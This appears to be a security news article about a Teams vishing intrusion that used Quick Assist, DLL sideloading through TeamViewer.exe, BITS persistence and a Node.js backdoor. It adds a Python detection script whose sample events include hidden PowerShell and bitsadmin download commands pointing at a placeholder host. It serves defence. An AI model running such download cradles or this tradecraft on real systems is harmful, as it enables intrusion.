Ontinue’s Cyber Defense Centre (CDC) recently investigated an incident that shows how a simple vishing call can turn into a full environment compromise. The attack combined social engineering with legitimate tools like Quick Assist, signed binaries, and malicious scripts to gain access, maintain persistence, and avoid detection.
A Teams Message and a Phone Call
The attack began with a Microsoft Teams message sent from what looked like a legitimate external user. Alongside that came a vishing call designed to build trust and guide the target into running a PowerShell command. That command downloaded a payload, the first stage of a larger chain. Quick Assist, a legitimate remote support tool built into Windows, was then used by the attacker to gain remote access.
Tools Used: Legitimate, Trusted and Misused
Once inside, the attacker dropped a signed binary, TeamViewer.exe, to a hidden folder. That executable was used to sideload a malicious DLL (TV.dll), helping to blend in with normal system activity. This type of sideloading isn’t new, but it remains effective, especially when using signed and widely trusted applications.
According to the company’s blog post shared with Hackread.com ahead of its release on Tuesday, the attacker placed a shortcut file in the startup folder so the malware would run again every time the system rebooted. They also used BITS (Background Intelligent Transfer Service) jobs to transfer files quietly and maintain access for up to 90 days.
The second stage involved a JavaScript-based backdoor (index.js) executed through Node.js. This gave the attacker full command-and-control access via a socket connection, complete with command execution capabilities and hardcoded credentials.
Although the CDC couldn’t confirm attribution with high confidence, the tactics observed in this attack closely resemble those associated with Storm-1811, a group previously identified by Microsoft.
The similarities include the use of Quick Assist for remote access, sideloading malicious DLLs via signed binaries, exploiting Microsoft Teams as an entry point, and relying on living-off-the-land techniques using built-in Windows tools. These overlaps align with recent findings from both Microsoft and Sophos, which documented similar vishing-driven campaigns involving abuse of remote support software.
Social Engineering: The Root Cause
The attack’s success depended on one thing: social engineering. The initial vishing call was the key that opened the door. Ontinue’s 2H Threat Intelligence Report already highlighted a 1633% increase in vishing attacks in Q1 2025, and this incident is proof that those numbers are more than just stats.
Jason Soroko, Senior Fellow at Sectigo, a Scottsdale-based certificate management provider, shared his perspective with Hackread.com, stating, “This attack started with a Teams vishing attempt that led to a signed binary slipping past defenses. The attacker sideloaded a malicious DLL into a trusted process, turning standard remote support into a stealthy entry point.”
“Defenders should watch for PowerShell commands in Teams messages, unexpected use of Quick Assist, and signed binaries like TeamViewer.exe running from unusual paths. Signs of DLL sideloading, such as TV.dll loading unexpectedly, are also red flags,” he added.
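The hunting advice above maps onto a handful of concrete host telemetry checks: a signed TeamViewer.exe running outside its install directory, TV.dll being loaded by that process from a non-standard location, a new shortcut in the Startup folder, BITS jobs created from the command line, and Node.js launching an index.js. The script below is an added example written for this article, not Ontinue’s or Hackread’s code, that runs those checks over a handful of constructed Sysmon-style events. The field names (event, image, cmdline, loaded, target), the trusted TeamViewer install directories, and the PowerShell download-cradle heuristic are assumptions; real telemetry needs a field mapping before these rules apply.

```python
"""Indicator checks for the Teams-vishing / Quick Assist / DLL-sideload chain.

Added example, not code from Ontinue or Hackread. Event records are
constructed Sysmon-style dicts; field names and install paths are assumptions.
"""
import re
from collections import Counter

# Where a legitimately installed TeamViewer.exe is expected to live (assumption).
TRUSTED_TEAMVIEWER_DIRS = (
    "c:\\program files\\teamviewer",
    "c:\\program files (x86)\\teamviewer",
)
# Per-user and all-users Startup folders share this path suffix.
STARTUP_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
# Common PowerShell download primitives (heuristic, not an exhaustive list).
DOWNLOAD_CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer)", re.I
)
BITS_CLI = re.compile(r"/(transfer|create|addfile|resume)\b", re.I)


def _norm(path: str) -> str:
    """Lower-case and use backslashes so comparisons are case/separator-insensitive."""
    return path.lower().replace("/", "\\")


def in_trusted_dir(path: str) -> bool:
    p = _norm(path)
    return any(p.startswith(d + "\\") for d in TRUSTED_TEAMVIEWER_DIRS)


def check_event(ev: dict) -> list[str]:
    """Return the names of every indicator this single event matches."""
    hits: list[str] = []
    kind = ev.get("event")
    image = _norm(ev.get("image", ""))
    exe = image.rsplit("\\", 1)[-1]
    cmdline = ev.get("cmdline", "")

    if kind == "process_create":
        if exe == "powershell.exe" and DOWNLOAD_CRADLE.search(cmdline):
            hits.append("powershell_download_cradle")      # the copied Teams command
        if exe == "teamviewer.exe" and not in_trusted_dir(image):
            hits.append("signed_binary_unusual_path")      # signed host dropped elsewhere
        if exe == "bitsadmin.exe" and BITS_CLI.search(cmdline):
            hits.append("bits_job_abuse")                  # quiet file transfer for persistence
        if exe == "node.exe" and re.search(r"\bindex\.js\b", cmdline, re.I):
            hits.append("nodejs_backdoor_launch")          # second-stage JavaScript backdoor
    elif kind == "image_load":
        loaded = _norm(ev.get("loaded", ""))
        # TV.dll pulled from a directory that is not the TeamViewer install path.
        if exe == "teamviewer.exe" and loaded.endswith("\\tv.dll") and not in_trusted_dir(loaded):
            hits.append("dll_sideload_tv_dll")
    elif kind == "file_create":
        target = _norm(ev.get("target", ""))
        if STARTUP_MARKER in target and target.endswith(".lnk"):
            hits.append("startup_folder_shortcut")         # reboot persistence
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, indicators) for every event that matched at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := check_event(ev))]


def indicator_counts(events: list[dict]) -> dict[str, int]:
    return dict(Counter(name for _, hits in scan(events) for name in hits))


# Constructed sample telemetry modelled on the chain described in the article.
HIDDEN = "C:\\Users\\alice\\AppData\\Local\\.hidden"
SAMPLE_EVENTS = [
    {"event": "process_create", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"iwr http://example.invalid/stage1 -OutFile $env:TEMP\\s1.exe\""},
    {"event": "process_create", "image": "C:\\Program Files\\TeamViewer\\TeamViewer.exe", "cmdline": "TeamViewer.exe"},
    {"event": "process_create", "image": HIDDEN + "\\TeamViewer.exe", "cmdline": "TeamViewer.exe"},
    {"event": "image_load", "image": HIDDEN + "\\TeamViewer.exe", "loaded": HIDDEN + "\\TV.dll"},
    {"event": "file_create", "image": HIDDEN + "\\TeamViewer.exe",
     "target": "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.lnk"},
    {"event": "process_create", "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer upd /download /priority normal http://example.invalid/x " + HIDDEN + "\\x"},
    {"event": "process_create", "image": HIDDEN + "\\node\\node.exe", "cmdline": "node.exe index.js"},
    {"event": "process_create", "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
    print(indicator_counts(SAMPLE_EVENTS))
```

The legitimate TeamViewer launch from Program Files produces no alert, while the copy in the hidden folder trips three separate rules (unusual path, TV.dll sideload, Startup shortcut); correlating those on one host within a short window is a far stronger signal than any single rule, which is how you would tune this for a SIEM rather than alerting on each line.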
This case is a reminder that threat actors don’t always need zero-days or malware. When users trust unfamiliar voices and messages, and when familiar tools are misused, attackers can do serious damage using what’s already available on the system.